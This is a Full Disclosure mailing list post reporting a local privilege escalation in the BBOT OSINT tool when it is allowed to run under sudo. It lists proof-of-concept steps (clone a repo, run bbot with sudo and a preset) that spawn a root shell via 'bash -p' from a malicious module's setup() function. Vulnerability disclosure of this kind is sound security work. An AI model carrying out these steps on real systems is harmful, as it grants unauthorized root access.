Hi Full Disclosure, I'd like to share a local privilege escalation technique involving BBOT (Bighuge BLS OSINT Tool) when misconfigured with sudo access.
--- Exploit Title: BBOT 2.1.0 - Local Privilege Escalation via Malicious Module Execution Date: 2025-04-16 Exploit Author: Huseyin Mardinli Vendor Homepage: https://github.com/blacklanternsecurity/bbot Version: 2.1.0.4939rc (tested) Tested on: Kali Linux Rolling (2025.1) CVE: N/A Platform: Linux Type: Local ### Description: BBOT allows execution of custom Python modules during OSINT scans. When configured as a sudo-executable (e.g., via NOPASSWD), a malicious module can escalate privileges via the `setup()` function. ### PoC Steps: 1. Clone: git clone https://github.com/Housma/bbot-privesc.git 2. Run with sudo: sudo /usr/local/bin/bbot -t dummy.com -p preset.yml --event-types ROOT 3. A root shell is spawned via `bash -p` from within the module. ### GitHub (Full Write-up + PoC): https://github.com/Housma/bbot-privesc --- This exploit highlights how trusted open-source tools can be abused in real-world environments. Regards, Huseyin Mardinli _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
